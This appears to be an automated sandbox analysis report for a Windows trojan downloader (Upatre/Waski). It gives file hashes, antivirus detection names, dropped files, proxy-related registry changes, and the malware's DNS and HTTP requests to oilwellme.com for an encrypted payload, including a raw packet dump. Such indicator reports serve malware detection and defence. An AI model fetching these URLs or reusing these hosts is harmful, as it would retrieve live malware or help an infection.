Analysis Date: 2015-10-16 13:00:36
MD5: b17691d326e81d01a1a2587bab90b1ec
SHA1: 1b86ddcb2dee3d497faba1904a83af4372a6992e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 9a13982b2d4f9a0d11c38303a15ed874 sha1: e716183327e2592ec1e1976c8a61688574dcee89 size: 6144
Section .rdata: md5: f0c791b7a01c1af7476b9114f630f86f sha1: 1d74c769f3266d112fbfd99e06624cbddbfa7d72 size: 1536
Section .data: md5: 308f2f2d626c29c61e6944c619d36bf1 sha1: 9d49af9013e6a959c3dc786c07e7154f8e4d9ba2 size: 512
Section .rsrc: md5: 320a63c0552666c12f361d403bd803b5 sha1: da20a8f355a94e57d8e8adb1b834d44d411a046a size: 10240
Section .reloc: md5: 1c6bd8f15b2d6e1575f05000eaa15adb sha1: 6694ebea140138563a76062c6828f1476956917c size: 512
Timestamp: 2014-02-05 03:58:40
PEhash: b6248038e0af3e67a33a86bcc7288619ab5ee56f
IMPhash: 7772dfa3e3a72b92db47c13e7be36e20
AV CA (E-Trust Ino): Win32/Upatre.IHNQSfC
AV Rising: no_virus
AV Mcafee: Downloader-FSH!B17691D326E8
AV Avira (antivir): TR/Yarwi.B.175
AV Twister: Trojan.48B2FFB2E5D67CFC
AV Ad-Aware: Trojan.GenericKD.1559553
AV Alwil (avast): Zbot-TCT [Trj]
AV Eset (nod32): Win32/TrojanDownloader.Waski.A
AV Grisoft (avg): Generic35.BQZI
AV Symantec: Backdoor.Trojan
AV Fortinet: W32/Waski.AC!tr
AV BitDefender: Trojan.GenericKD.1559553
AV K7: Trojan-Downloader ( 0040f7f11 )
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre.AA
AV MicroWorld (escan): Trojan.GenericKD.1559553
AV MalwareBytes: Trojan.Email.FakeDoc
AV Authentium: W32/Trojan.ARNH-0894
AV Frisk (f-prot): W32/Trojan3.HKX
AV Ikarus: Trojan-Downloader.Win32.Upatre
AV Emsisoft: Trojan.GenericKD.1559553
AV Zillya!: Downloader.Injecter.Win32.5152
AV Kaspersky: Trojan-Downloader.Win32.Injecter.jir
AV Trend Micro: TROJ_UPATRE.SM37
AV CAT (quickheal): TrojanDownloader.Upatre.A4
AV VirusBlokAda (vba32): TrojanDownloader.Injecter
AV Padvish: Downloader.Win32.Injecter.ji_Generic
AV BullGuard: Trojan.GenericKD.1559553
AV Arcabit (arcavir): Trojan.GenericKD.1559553
AV ClamAV: Win.Trojan.Upatre-2359
AV Dr. Web: Trojan.DownLoad3.28161
AV F-Secure: Trojan-Downloader:W32/Upatre.I

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\trueupdater.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\trueupdater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\trueupdater.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: oilwellme.com
Winsock DNS: newz24x.com

Network Details:

DNS: oilwellme.com
Type: A
182.18.143.140
DNS: newz24x.com
Type: A
HTTP GET: http://oilwellme.com/images/banners/pdf.enc
User-Agent: Updates downloader
HTTP GET: http://oilwellme.com/images/banners/pdf.enc
User-Agent: Updates downloader
Flows TCP: 192.168.1.1:1031 ➝ 182.18.143.140:80
Flows TCP: 192.168.1.1:1032 ➝ 182.18.143.140:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 62616e6e   GET /images/bann
0x00000010 (00016)   6572732f 7064662e 656e6320 48545450   ers/pdf.enc HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a207465   /1.1..Accept: te
0x00000030 (00048)   78742f2a 2c206170 706c6963 6174696f   xt/*, applicatio
0x00000040 (00064)   6e2f2a0d 0a557365 722d4167 656e743a   n/*..User-Agent:
0x00000050 (00080)   20557064 61746573 20646f77 6e6c6f61    Updates downloa
0x00000060 (00096)   6465720d 0a486f73 743a206f 696c7765   der..Host: oilwe
0x00000070 (00112)   6c6c6d65 2e636f6d 0d0a4361 6368652d   llme.com..Cache-
0x00000080 (00128)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000090 (00144)   650d0a0d 0a                           e....

Strings